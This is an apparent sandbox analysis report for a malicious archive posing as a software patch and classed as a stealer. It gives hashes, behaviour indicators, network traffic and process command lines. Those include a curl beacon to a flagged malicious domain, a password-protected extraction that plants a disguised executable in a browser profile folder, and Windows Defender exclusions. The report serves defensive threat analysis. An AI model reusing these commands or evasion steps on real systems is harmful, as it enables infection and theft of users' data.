File name:

Patch.7z

Full analysis: https://app.any.run/tasks/14caf700-db1a-4cbb-abc1-9ce5f9bb0ee7
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: February 14, 2025, 19:22:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
evasion
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

DF50A016C6A467AFB1D9BAF64A8FA777

SHA1:

37B8B5564DA5860AD20B60348893D674A069E76A

SHA256:

21EC5341D805322B77C67A1E5886E03880D62B19BD8AFD6D07B101F920EA855F

SSDEEP:

98304:xrTw5/kwnXIubgPFuiSIy3lDg+6ABWEirS8Aj/OEbXwewKsh+uxxpuDs8342ReE3:DNK8Pkq003zScRcV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 640)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 640)
    • Actions look like stealing of personal data

      • 7z.exe (PID: 1876)
      • csrss.exe (PID: 616)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • cmd.exe (PID: 640)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6368)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Executable content was dropped or overwritten

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)
    • Drops 7-zip archiver for unpacking

      • Patch JB 2023.x.x.exe (PID: 6160)
    • Executing commands from a ".bat" file

      • Patch JB 2023.x.x.exe (PID: 6760)
    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 640)
    • Starts CMD.EXE for commands execution

      • Patch JB 2023.x.x.exe (PID: 6760)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 640)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 640)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 640)
    • Process drops legitimate windows executable

      • 7z.exe (PID: 1876)
    • The process creates files with name similar to system file names

      • 7z.exe (PID: 1876)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 640)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 640)
    • Checks Windows Trust Settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Connects to unusual port

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Checks for external IP

      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • svchost.exe (PID: 2192)
    • The executable file from the user directory is run by the CMD process

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Connects to SMTP port

      • Windows Driver Foundation (WDF).exe (PID: 2976)
  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6368)
    • The sample compiled with English language support

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)
    • Execution of CURL command

      • cmd.exe (PID: 640)
    • Reads the computer name

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Checks supported languages

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • curl.exe (PID: 4020)
    • Create files in a temporary directory

      • curl.exe (PID: 7096)
    • Creates files or folders in the user directory

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • The sample compiled with Chinese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Polish language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Czech language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Italian language support

      • 7z.exe (PID: 1876)
    • The sample compiled with French language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Japanese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Korean language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Russian language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Portuguese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Turkish language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Spanish language support

      • 7z.exe (PID: 1876)
    • Reads the machine GUID from the registry

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Creates files in the program directory

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Checks proxy server information

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Disables trace logs

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Reads the software policy settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)

EXIF

ZIP

FileVersion: 7z v0.04
ModifyDate: 2023:06:27 17:36:29+00:00
ArchivedFileName: Patch JB 2023.x.x.exe
No data.
All screenshots are available in the full report
Total processes
162
Monitored processes
12
Malicious processes
3
Suspicious processes
5

Behavior graph

Processes shown in the behavior graph: winrar.exe, patch jb 2023.x.x.exe, cmd.exe (no specs), svchost.exe, patch jb 2023.x.x.exe, cmd.exe, curl.exe, 7z.exe, windows driver foundation (wdf).exe, curl.exe, rundll32.exe (no specs), csrss.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 616
CMD: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
Path: C:\Windows\System32\csrss.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Client Server Runtime Process
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 640
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\cc.bat""
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1876
CMD: "C:\Program Files (x86)\7-zip\7z.exe" x "C:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7z" -o"C:\Users\admin\AppData\Local\google\chrome\user data" -pvdgdfgfHDSzxsHJCXdfdt45rtec5 -y
Path: C:\Program Files (x86)\7-Zip\7z.exe
Parent process: cmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
HIGH
Description:
7-Zip Console
Exit code:
0
Version:
22.01
Modules
Images
c:\program files (x86)\7-zip\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\msvcp_win.dll
PID: 2120
CMD: C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path: C:\Windows\System32\rundll32.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
PID: 2192
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2976
CMD: "C:\Users\admin\AppData\Local\google\chrome\user data\windows driver foundation (wdf).exe" -sdkKey 4e778bf2-7730-4884-91bb-ae9e7f00d213
Path: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Windows Driver Foundation (WDF).exe
Parent process: cmd.exe
User:
admin
Integrity Level:
HIGH
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\google\chrome\user data\windows driver foundation (wdf).exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 4020
CMD: curl -k -L "https://zeltitmp.net/pp/cu/cu.php?ip=84.17.49.16&vos=10&cid=DE&sid=jb23_3&pid=p2&s=1" --user-agent "cnfvp201"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 6160
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
PID: 6368
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Patch.7z
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 6760
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
5 425
Read events
5 403
Write events
22
Delete events
0

Modification events

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Patch.7z

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (2976) Windows Driver Foundation (WDF).exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (2976) Windows Driver Foundation (WDF).exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0
Executable files
192
Suspicious files
4
Text files
27
Unknown types
0

Dropped files

PID
Process
Filename
Type
PID: 6160
Process: Patch JB 2023.x.x.exe
Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbl.7z
Type:
MD5:
SHA256:

PID: 6160
Process: Patch JB 2023.x.x.exe
Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\7z2201.exe
Type: executable
MD5: 734E95CDBE04F53FE7C28EEAAAAD7327
SHA256: 8C8FBCF80F0484B48A07BD20E512B103969992DBF81B6588832B08205E3A1B43

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.Sinks.Http.xml
Type: xml
MD5: 13222C8CB2094F4A07612968F5ABAC62
SHA256: 4B70FBCE077922EE5319DFD6225BF4A33076C8B885FB72BEEBB0C8AC459D3A4D

PID: 6368
Process: WinRAR.exe
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe
Type: executable
MD5: 2225A9180E142415AE27486FC2631809
SHA256: 78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6

PID: 6160
Process: Patch JB 2023.x.x.exe
Filename: C:\Users\admin\AppData\Local\Temp\0CNOMD1A.bat
Type: text
MD5: DC730F24799DF72D573C61FBE2CFE19F
SHA256: 3AD7D102E167A040188C725DFCB789E31E11D11ACFD6F395246275744497E320

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.Sinks.PeriodicBatching.xml
Type: xml
MD5: 927D41A2570B5B0C2E950BC2C290A0A5
SHA256: 6489C4D9E147ADF0C1B7C16B1D7187A8C6EF4ED15E94AD7E53E822977A08FBA9

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Serilog.xml
Type: xml
MD5: 4AE50EE65BF867DAE8311C45F84F8CB5
SHA256: 54C024B0991C1814D62C071FE2BFB2C3E34776D91DEDBFEE5251BEE4408D76E8

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\msdatsrc.tlb
Type: executable
MD5: 973FBDCE02205F14EA295236E08A2350
SHA256: BFAE1BE26E15ABDE04C100257494AA79DB0855997CD53B06D25BA13B590137BC

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Extensions.Logging.Abstractions.xml
Type: xml
MD5: FFFC56AEC29193A7FAAB2EA8BA881606
SHA256: 8EA6209C93E063A0F0E03FEB43DBE05F0E7E4CD5117B6519C566183D27B7B81C

PID: 1876
Process: 7z.exe
Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Newtonsoft.Json.xml
Type: xml
MD5: D398FFE9FDAC6A53A8D8BB26F29BBB3C
SHA256: 79EE87D4EDE8783461DE05B93379D576F6E8575D4AB49359F15897A854B643C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
48
DNS requests
28
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.163:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6600
backgroundTaskHost.exe
GET
200
23.54.109.203:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2976
Windows Driver Foundation (WDF).exe
GET
200
51.159.182.2:80
http://verification.repocket.com/api/peer/verification
unknown
unknown
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2976
Windows Driver Foundation (WDF).exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
23.48.23.163:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
104.126.37.128:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
2.19.106.8:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2.21.65.132:443
www.bing.com
Akamai International B.V.
NL
whitelisted
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
34.117.59.81:443
ipinfo.io
GOOGLE-CLOUD-PLATFORM
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.163
  • 23.48.23.159
  • 23.48.23.161
  • 23.48.23.172
  • 23.48.23.173
  • 23.48.23.169
  • 23.48.23.170
  • 23.48.23.160
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 23.54.109.203
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
login.live.com
  • 20.190.159.4
  • 40.126.31.0
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.130
  • 40.126.31.1
  • 20.190.159.71
  • 40.126.31.73
whitelisted
c.zeltitmp.net
  • 141.136.39.211
malicious
zeltitmp.net
  • 141.136.39.211
malicious

Threats

PID
Process
Class
Message
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
Device Retrieving External IP Address Detected
ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
Device Retrieving External IP Address Detected
ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
2976
Windows Driver Foundation (WDF).exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup ip-api.com
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
No debug info